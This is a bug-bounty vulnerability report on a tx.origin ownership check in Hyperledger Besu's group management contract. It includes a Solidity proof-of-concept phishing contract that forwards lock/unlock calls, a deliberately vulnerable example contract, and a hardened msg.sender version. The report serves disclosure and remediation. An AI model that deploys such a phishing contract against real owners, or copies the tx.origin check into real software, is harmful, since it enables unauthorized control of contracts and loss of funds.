# #37577 \[BC-Insight] \`tx.origin\` Usage in Group Management Contract Allows Phishing Attack for Unauthorized Actions

**Submitted on Dec 9th 2024 at 16:37:44 UTC by @cheems for** [**Attackathon | Ethereum Protocol**](https://immunefi.com/audit-competition/ethereum-protocol-attackathon)

* **Report ID:** #37577
* **Report Type:** Blockchain/DLT
* **Report severity:** Insight
* **Target:** <https://github.com/hyperledger/besu>
* **Impacts:**
  * Direct loss of funds

## Description

## Brief/Intro

A critical vulnerability exists in the on-chain group management contract introduced in [PR #1288](https://github.com/hyperledger/besu/pull/1288), where `tx.origin` is used to verify the contract owner. Because `tx.origin` is the externally owned account that started the transaction, not the immediate caller, any contract the owner is lured into calling can forward a call to the management contract and pass the ownership check, letting an attacker lock/unlock the contract or modify group membership through the owner's own transaction. The `tx.origin` check was added as part of removing the enclave key, with the goal of ensuring that only the creator could update the contract.

## Vulnerability Details

In this PR (<https://github.com/hyperledger/besu/pull/1288>), the intention was to ensure that only the creator's account could add/remove members and update the management contract. However, using `tx.origin` to validate ownership exposes the contract to phishing attacks. `tx.origin` is the account that originated the transaction, so it remains equal to the owner across every nested call made in that transaction. The attacker therefore does not need to call the management contract directly: it is enough to get the owner to send a transaction to an attacker-controlled contract, which then calls `lock()`, `unlock()` or the membership functions while the ownership check still sees `tx.origin == owner`. A call sent from the attacker's own account would fail, because `tx.origin` would then be the attacker; the attack depends on the owner originating the transaction.

## Link to Proof of Concept

<https://gist.github.com/SamruddhiNavale/100b48157a7101d53bee9056b2a7dbb7>

## Proof of Concept

```solidity
pragma solidity ^0.8.0;

// Only the two entry points the PoC exercises are declared here; the
// membership functions of the management contract are guarded the same way.
interface IVulnerableContract {
    function lock() external;
    function unlock() external;
}

// Attacker-controlled contract. Its forwarded calls pass the target's
// tx.origin check only when the owner's account sends the transaction;
// called by anyone else, tx.origin is that caller and the target reverts.
contract MaliciousContract {
    IVulnerableContract public vulnerableContract;

    constructor(address _vulnerableContract) {
        vulnerableContract = IVulnerableContract(_vulnerableContract);
    }

    function attackLock() public {
        vulnerableContract.lock(); // tx.origin is still the owner, so the check passes
    }

    function attackUnlock() public {
        vulnerableContract.unlock(); // same tx.origin impersonation
    }
}
```

#### **Steps to Reproduce:**

1. **Deploy the Vulnerable Contract** on a local test network from the owner's account, so that this account is the one `tx.origin` is compared against.
2. **Deploy the Malicious Contract**, passing the vulnerable contract address.
3. **Have the owner's account call `attackLock()` or `attackUnlock()`** on the malicious contract (in a real attack the owner is lured into sending this transaction, for example by presenting the contract as an unrelated dApp interaction).
4. **Verify** that the vulnerable contract is now locked/unlocked even though the owner never called it directly, and, as a control, that the same call sent from a non-owner account reverts.

***

#### **Expected Result:**

The contract should only allow the actual owner to lock/unlock or modify its state.

#### **Actual Result:**

The malicious contract can lock/unlock or modify the contract state, because the owner's transaction carries the owner's address as `tx.origin` through the malicious contract's forwarded call.

***

#### **Impact:**

This vulnerability allows attackers to impersonate the contract owner and perform unauthorized actions, bypassing the intended ownership checks. It can lead to unauthorized updates to the contract and loss of control over group management.

***

#### **Mitigation Recommendations:**

1. **Avoid using `tx.origin`** for ownership checks; it identifies the transaction originator, not the caller.
2. **Use `msg.sender`**, the immediate caller, for access control, so that a call forwarded through another contract is attributed to that contract and rejected.
3. **Implement proper access control mechanisms** such as an `onlyOwner` modifier based on `msg.sender` (for example OpenZeppelin's `Ownable`).
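
The following is an added illustration for the Vulnerability Details and the mitigation above, not Besu's contract and not the reporter's code: a minimal group-management contract with the flawed `tx.origin` ownership check, a phishing contract that forwards a privileged call, and the same contract hardened with `msg.sender`. All contract and function names are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical minimal group-management contract (not Besu's own code) in which
// ownership is checked with tx.origin, reproducing the flaw the report describes.
contract VulnerableGroupManagement {
    address public owner;
    bool public locked;
    mapping(bytes32 => bool) public members;

    constructor() {
        // Whoever originated the deployment transaction becomes the owner.
        owner = tx.origin;
    }

    // Flawed check: tx.origin is the externally owned account at the root of the
    // call chain, so it stays equal to the owner through any contract the owner calls.
    modifier onlyOwnerByTxOrigin() {
        require(tx.origin == owner, "not owner");
        _;
    }

    function lock() external onlyOwnerByTxOrigin { locked = true; }
    function unlock() external onlyOwnerByTxOrigin { locked = false; }
    function addMember(bytes32 key) external onlyOwnerByTxOrigin { members[key] = true; }
    function removeMember(bytes32 key) external onlyOwnerByTxOrigin { delete members[key]; }
}

// Attacker-controlled contract. claimReward() is bait the owner is lured into
// calling; the forwarded lock() succeeds only because tx.origin is still the owner.
contract Phisher {
    VulnerableGroupManagement public target;

    constructor(VulnerableGroupManagement _target) {
        target = _target;
    }

    function claimReward() external {
        // Inside target.lock(), msg.sender is this contract and tx.origin is whoever
        // sent the transaction: sent by the owner it passes, sent by the attacker it reverts.
        target.lock();
    }
}

// Hardened form: the same contract with the check on msg.sender, the immediate
// caller. A call forwarded through Phisher now arrives with
// msg.sender == address(Phisher) and is rejected whoever originated the transaction.
contract HardenedGroupManagement {
    address public owner;
    bool public locked;
    mapping(bytes32 => bool) public members;

    constructor() {
        owner = msg.sender;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    function lock() external onlyOwner { locked = true; }
    function unlock() external onlyOwner { locked = false; }
    function addMember(bytes32 key) external onlyOwner { members[key] = true; }
    function removeMember(bytes32 key) external onlyOwner { delete members[key]; }
}
```

Deploy `VulnerableGroupManagement` from the owner's account, deploy `Phisher` pointing at it, and send `claimReward()` from the owner's account: `locked` becomes `true` although the owner never called `lock()`. Send the same `claimReward()` from the attacker's account and the `require` reverts, which is why the attack needs the owner to originate the transaction. With `HardenedGroupManagement` as the target the forwarded call is rejected from both accounts. One caveat on the hardened constructor: it records `msg.sender`, so if the contract is deployed through a factory contract that factory becomes the owner; in that case pass the intended owner address explicitly instead.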

***

#### **Conclusion:**

This vulnerability, introduced in PR #1288, exposes the contract to phishing attacks by using `tx.origin`. The attacker does not need the owner's key or a direct call to the management contract: it is enough that the owner is induced to send a transaction to an attacker-controlled contract, which then forwards the privileged call while `tx.origin` still equals the owner.

